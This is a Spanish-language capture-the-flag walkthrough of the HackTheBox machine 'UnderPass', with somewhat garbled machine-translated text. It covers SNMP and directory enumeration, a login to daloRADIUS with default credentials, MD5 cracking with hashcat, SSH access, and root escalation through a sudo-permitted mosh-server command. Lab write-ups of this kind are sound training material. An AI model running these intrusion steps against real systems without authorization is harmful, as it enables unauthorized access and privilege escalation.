UnderPass (UDP , TCP)
Mirando la pagina http:
Pruebe un escaneo de puerto UDP:
nmap -sU underpass.htb -T5 Not shown: 717 closed udp ports (port-unreach), 282 open|filtered udp ports (no-response)
PORT STATE SERVICE
161/udp open snmp
Nmap done: 1 IP address (1 host up) scanned in 888.71 secondsUDPPuerto abierto: 161, y podrás ver que hay un SNMPservicio abierto
SNMP se llama Protocolo simple de administración de red y su método de comunicación UDPes 161. El servidor SNMP , es decir, el extremo administrado donde se consulta la información, usa el puerto y el cliente usa el puerto.162UDP161162
verificación SNMP
Puedes ver que hay steve@underpass.htbnombres de usuario y hay un daloradiusservicio para
En su Github encontré un posible camino./var/www/daloradius
Dirbúsqueda
┌──(docker㉿docker)-[~/HackBox]
└─$ dirsearch -u "http://underpass.htb/daloradius/" -t 50
Entramos a docker-compose.yml:
Escaneando nuevo directorio http://underpass.htb/daloradius/app/
┌──(docker㉿docker)-[~/HackBox]
└─$ dirsearch -u "http://underpass.htb/daloradius/app/" -t 50
Luego /daloradius/doc/install/INSTALLencontré la información de la versión y el nombre de usuario y contraseña predeterminados en
Haciendo mas busqueda de directorios de directorios con dirsearch encontramos algo llamado:
Como no puede /app/useriniciar sesión directamente desde , intente realizar /appun análisis más completo del directorio sin utilizar el diccionario predeterminado.
dirsearch -u "http://underpass.htb/daloradius/app/" -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ❯ dirsearch -u "http://underpass.htb/daloradius/app/" -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 50 | Wordlist size: 220545
Output File: /home/kali/UnderPass/reports/http_underpass.htb/_daloradius_app__24-12-22_16-13-23.txt
Target: http://underpass.htb/
[16:13:23] Starting: daloradius/app/
[16:13:24] 301 - 330B - /daloradius/app/common -> http://underpass.htb/daloradius/app/common/
[16:13:24] 301 - 329B - /daloradius/app/users -> http://underpass.htb/daloradius/app/users/
[16:13:37] 301 - 333B - /daloradius/app/operators -> http://underpass.htb/daloradius/app/operators/
Task Completed Utilice /app/operatorsla contraseña predeterminada para iniciar sesión en el backend
Grieta MD5
Valor Passwordencontrado para en la lista de usuariosMD5
usar John the Ripper, explotar
┌──(docker㉿docker)-[~/HackBox]
└─$ hashcat -m 0 -a 0 md5.txt /usr/share/wordlists/rockyou.txt412dd4759978acfcc81deab01b382403:underwat******* HACERLO TUEntramos por ssh:
┌──(docker㉿docker)-[~/HackBox]
└─$ ssh svcMosh@underpass.htbsvcMosh@underpass:~$ ls
user.txt
svcMosh@underpass:~$ Escalada de privilegios
No se encontró nada de valor en la base de datos. Al cargar, Linpeas encontró un comando con permisos especiales.
Puede ver --serverque el comando de parámetro predeterminado es este mosh-server, y el comando de superprivilegio propiedad del usuario actual también es este
Por lo tanto puedes conectarte a ti mismo a través de este parámetro:
┌──(docker㉿docker)-[~/HackBox]
└─$ mosh --server="sudo /usr/bin/mosh-server" svcMosh@underpass.htbSomos root:
root@underpass:~# ls
root.txtLast updated